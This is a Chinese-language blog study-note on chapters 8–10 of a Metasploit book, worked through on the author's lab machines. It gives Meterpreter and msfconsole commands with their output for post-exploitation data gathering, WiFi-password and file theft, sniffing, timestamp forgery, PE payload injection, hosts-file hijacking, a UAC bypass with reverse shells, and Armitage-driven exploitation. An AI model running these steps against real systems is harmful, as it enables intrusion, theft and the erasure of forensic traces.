MasterMsf 8/9/10 Last But Not Least
启程
因为希望是在于将来,决不能以我之必无的证明,来折服了他之所谓可有。
这篇笔记记录了MasterMsf最后三章的实践内容,分别为:
Don’t be afraid to steal, just steal the right stuff.
第八章将研究Metasploit的扩展功能和post模块的核心部分。
If everything seems under control, you’re not going fast enough.
第九章将探索提高渗透测试效率的方法。
Vulnerability is the essence of romance. It’s the art of being uncalculated, the willingness to look foolish, the courage to say, “This is me, and I’m interested in you enough to show you my flaws with the hope that you may embrace me for all that I am but, more important, all that I am not”.
(These sentences are amazing! It seems like that I am reading not a book about penetration to a computer but PENERATION TO A HEART.)
第十章将探索Armitage。
其他后渗透基础命令
顾名思义,“后渗透”就是我们已经成功渗透目标系统后的阶段。书中这一章的内容与前面的章节(MasterMsf 1 走近Metasploit渗透测试框架和MasterMsf 2 定制Metasploit Part 3)有些重复,我将略过这些部分。
获取机器ID
meterpreter > machine_id
[+] Machine ID: 187f7d28d552e498196177df97a6d114
计算目标系统闲置时间
meterpreter > idletime
User has been idle for: 28 secs
(从而在用户不怎么使用计算机的时候发动攻击)
getsystem
这里想要说的是getsystem在新的Windows中不太稳定,最好使用本地提权模块来达到目的。(如对于Windows Server 2008 SP1
可以尝试exploit/windows/local/ms10_015_kitrap0d
提权)
timestomp
meterpreter > timestomp --help
Usage: timestomp <file(s)> OPTIONS
OPTIONS:
-a <opt> Set the "last accessed" time of the file
-b Set the MACE timestamps so that EnCase shows blanks
-c <opt> Set the "creation" time of the file
-e <opt> Set the "mft entry modified" time of the file
-f <opt> Set the MACE of attributes equal to the supplied file
-h Help banner
-m <opt> Set the "last written" time of the file
-r Set the MACE timestamps recursively on a directory
-v Display the UTC MACE values of the file
-z <opt> Set all four attributes (MACE) of the file
这是一个和计算机取证有关的很有意思的命令,目标计算机上有一个bof-server.exe,我们将其时间改为2017年:
然后到目标系统上看一下,修改成功了:
其他后渗透模块
模块太多,还需要自己深入挖掘。这里展示一些有意思的。
无线网络相关
# 收集附近的无线网络信息
meterpreter > run post/windows/wlan/wlan_bss_list
[*] WlanAPI Handle Closed Successfully
# 收集wifi密码
meterpreter > run post/windows/wlan/wlan_profile
[*] No wireless interfaces
上面显示我的虚拟机附近没有无线网络,这是正常的。。
获取应用程序列表
meterpreter > run get_application_list
Installed Applications
======================
Name Version
---- -------
010 Editor 6.0.2 (32-bit)
7-Zip 9.20
Alternate DLL Analyzer 1.540
Cheat Engine 6.7
Compuware SoftICE v4.3.2.2485 & IceExt 0.70 Lite Edition
HashCheck Shell Extension (x86-32) 2.1.11.1
HashTab 6.0.0.28 6.0.0.28
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595) 1
Hotfix for Windows XP (KB954550-v5) 5
获取环境变量
meterpreter > run get_env
[*] Getting all System and User Variables
Enviroment Variable list
========================
Name Value
---- -----
APPDATA C:\Documents and Settings\Administrator\Application Data
CLIENTNAME Console
ComSpec C:\WINDOWS\system32\cmd.exe
HOMEDRIVE C:
HOMEPATH \Documents and Settings\Administrator
NUMBER_OF_PROCESSORS 1
OS Windows_NT
PATHEXT .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE x86
PROCESSOR_IDENTIFIER x86 Family 6 Model 142 Stepping 9, GenuineIntel
TEMP C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
windir C:\WINDOWS
枚举服务
meterpreter > run post/windows/gather/enum_services
[*] Listing Service Info for matching services, please wait...
[+] New service credential detected: Alerter is running as 'NT AUTHORITY\LocalService'
[+] New service credential detected: AppMgmt is running as 'LocalSystem'
[+] New service credential detected: aspnet_state is running as 'NT AUTHORITY\NetworkService'
Services
========
Name Credentials Command Startup
---- ----------- ------- -------
ALG NT AUTHORITY\LocalService Manual C:\WINDOWS\System32\alg.exe
Alerter NT AUTHORITY\LocalService Disabled C:\WINDOWS\system32\svchost.exe -k LocalService
AppMgmt LocalSystem Manual C:\WINDOWS\system32\svchost.exe -k netsvcs
AudioSrv LocalSystem Auto C:\WINDOWS\System32\svchost.exe -k netsvcs
获取USB历史信息
meterpreter > run post/windows/gather/usb_history
[*] Running module against DESTINY-7846DE5
[*]
A: FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
D: IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
F: Disk 7a457a45
E: Disk 4f494d44
[*] WD Elements 25A2 USB Device
=====================================================================================
Disk lpftLastWriteTime Unknown
Manufacturer (标准磁盘驱动器)
Class DiskDrive
Driver {4D36E967-E325-11CE-BFC1-08002BE10318}\0001
想想stuxnet是怎么进入隔离网络的。
查找文件
这个功能很酷炫!假设我们获知目标系统上有一张名为p2422196991
的机密照片,我们要获取这张照片。
meterpreter > search -f p2422196991.*
Found 2 results...
c:\Documents and Settings\Administrator\Recent\p2422196991.lnk (468 bytes)
e:\gadgets\p2422196991.jpg (1130039 bytes)
然后就可以下载了!
meterpreter > download e:\\gadgets\\p2422196991.jpg
[*] Downloading: e:\gadgets\p2422196991.jpg -> p2422196991.jpg
[*] Downloaded 1.00 MiB of 1.08 MiB (92.79%): e:\gadgets\p2422196991.jpg -> p2422196991.jpg
[*] Downloaded 1.08 MiB of 1.08 MiB (100.0%): e:\gadgets\p2422196991.jpg -> p2422196991.jpg
[*] download : e:\gadgets\p2422196991.jpg -> p2422196991.jpg
或许有人想看看这张照片:
高级扩展功能
流量嗅探
meterpreter > load sniffer
Loading extension sniffer...Success.
# 列出所有接口
meterpreter > sniffer_interfaces
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
# 开始嗅探,缓冲区大小为1000
meterpreter > sniffer_start 1 1000
[*] Capture started on interface 1 (1000 packet buffer)
# 下载流量包
meterpreter > sniffer_dump 1 xp_1.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 38 packets (6192 bytes)
[*] Downloaded 100% (6192/6192)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to xp_1.pcap
然后就可以在Wireshark中查看:
Dump内存
meterpreter > load winpmem
Loading extension winpmem...Success.
meterpreter > dump_ram
[-] Usage: dump_ram [output_file]
meterpreter > dump_ram xp_ram.dat
[+] Driver PMEM loaded successfully
[+] Dumping 1073741824 bytes (press Ctrl-C to abort)
^C[*] Unloading driver
[-] Error running command dump_ram: Interrupt
这个功能有点生猛。
PE文件注入
向一个PE文件中注入payload。这样一来,当这个PE文件运行时,我们的payload会一起运行,很酷吧!
meterpreter > load peinjector
Loading extension peinjector...Success.
meterpreter > injectpe -p windows/exec -o cmd=calc -t bof-server.exe
[*] Generating payload
[*] Injecting Windows Execute Command into the executable bof-server.exe
[+] Successfully injected payload into the executable: bof-server.exe
测试:
参考lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb
可以了解一下它的原理。
host文件注入
这个也挺好玩:劫持静态域名解析。
msf exploit(rambo/my_dep_no) > use post/windows/manage/inject_host
msf post(windows/manage/inject_host) > set DOMAIN www.4399.com
DOMAIN => www.4399.com
msf post(windows/manage/inject_host) > set IP 172.16.56.1
IP => 172.16.56.1
msf post(windows/manage/inject_host) > set SESSION 5
SESSION => 5
msf post(windows/manage/inject_host) > exploit
[*] Inserting hosts file entry pointing www.4399.com to 172.16.56.1..
[+] Done!
[*] Post module execution completed
测试:
Bypass UAC
之前做的bypass uac都失败了。这次装了一个新的x86 Win7,来试一下:
msf > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > run
[*] Started reverse TCP handler on 192.168.1.101:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (179779 bytes) to 192.168.1.101
[*] Meterpreter session 3 opened (192.168.1.101:4444 -> 192.168.1.101:61046) at 2018-10-30 22:58:05 +0800
meterpreter > getuid
Server username: WIN-J7CB6NT7B29\rambo
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
动态切换模块
我经常遇到需要在run一个模块之前切出去使用另一个模块,然后再回来使用这个模块的情况。比如我们在准备exploit一个漏洞的时候,忽然想起之前投递了恶意pdf文件,但是忘记为它开启对反向shell的监听了,那么我们就可以先将当前exploit压栈,去设置一个handler,然后再将当前exploit出栈,很方便。
msf exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 172.16.56.130
RHOST => 172.16.56.130
msf exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf exploit(unix/ftp/vsftpd_234_backdoor) > pushm
msf exploit(unix/ftp/vsftpd_234_backdoor) > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 172.16.56.1
LHOST => 172.16.56.1
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit -jz
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 172.16.56.1:4444
msf exploit(multi/handler) > popm
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.56.130 yes The target address
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
可以看到,在popm后各种选项设置与之前相同,所以没必要再次设置了。
模块的加载与编辑
在MasterMsf 3 渗透模块开发我已经提到过如何存放自己开发的模块,从而使其不至于与官方模块混淆,又能自动被加载。我们之前也接触过了reload
/reload_all
这两个命令。
事实上,如果不想把模块放在$HOME
中msf的目录内,可以自己建立一个目录,其层次结构依然要按照Metasploit的模块层次结构设置。最后在msfconsole中使用loadpath
加载这个目录即可。
另外,我们可以直接在msfconsole中输入edit
编辑当前模块,然后reload就可以,不必退出msfconsole去修改。测试一下,首先看看这个模块的名称:
输入edit
后会打开一个VI窗口:
修改后reload:
使用资源脚本
频繁配置相同的选项很烦。比如设置handler监听,因为无论是在做实验还是现实中的测试,某段时间内针对的IP就那几个,还要每次关闭msfconsole后再打开继续时却又要重新输入一遍冗长的payload的配置!对,我说的就是set payload windows/meterpreter/reverse_tcp
!虽然我手速很快,但是也免不了很烦。什么,你说可以用tab补全?可是tab补全需要的查找时间也很长!
我们可以借助makerc
录制一个宏:
msf exploit(multi/handler) > makerc -h
Usage: makerc <output rc file>
Save the commands executed since startup to the specified file.
比如录制一个专门做反向shell监听的宏:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 172.16.56.1
LHOST => 172.16.56.1
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit -jz
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 172.16.56.1:4444
msf exploit(multi/handler) > makerc multi_hand_re
[*] Saving last 5 commands to multi_hand_re ...
以后就省事了:
你只需要载入宏,然后余下的所有事情由msf和靶机替你完成,很轻松!
阅读Resource Scripts可以获得更多相关信息。另外,在framework/scripts/resource
下有很多官方资源文件。
使用AutoRunScript
首先要说的是,输入show advanced
你将发现新大陆:
msf exploit(multi/handler) > show advanced
Module advanced options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
ExitOnSession true yes Return from the exploit after a session has been created
ListenerTimeout 0 no The maximum number of seconds to wait for new sessions
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 0 no Additional delay when waiting for a session
Payload advanced options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoVerifySession true yes Automatically verify and drop invalid sessions
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadBindPort no Port to bind reverse tcp socket to on target system.
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
真的很细致。不过在不同的模块和载荷之间,这些选项会有一些差异。我们现在关注其中的AutoRunScript
。它可以自动执行后渗透脚本。比如我们编写一个脚本如下:
# multi_commands.rc
sysinfo
run checkvm
getuid
run migrate -f
然后在上一节的资源脚本中添加一行
set AutoRunScript multiscript -rc /Users/rambo/multi_commands.rc
这样就能实现自动渗透和后渗透了:
使用Armitage
这个应该是最酷炫的hacking-tool了。它老少皆宜、界面友好!
我们在Kali中完成这个实验。在启动它之前,需要
service postgresql start
service metasploit start
它包含三个区:
- 上左:Metasploit的所有模块
- 上右:网络中当前在线的计算机
- 下:命令行
添加并激活一个工作区:
内网扫描
我们尝试MSF scan去扫描172.16.56.0/24
。扫描需要一段时间,结束后会直观地看到结果:
漏洞匹配
点击Find Attacks去匹配服务与漏洞:
渗透
右键选择渗透方式:
攻击成功后:
我们可以右键靶机去与shell交互:
最后,在进行大规模的渗透测试时,Cortana脚本可以极大地提高测试效率,这里是一份Cortana脚本教程。
总结
Mastermsf书中的内容研习至此,希望未来能渐渐深入了解其各种神奇操作的原理。总之,这不仅仅是一个工具了,它体现了一种融合了软件工程思想的工程化渗透理念。
To follow the path,
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.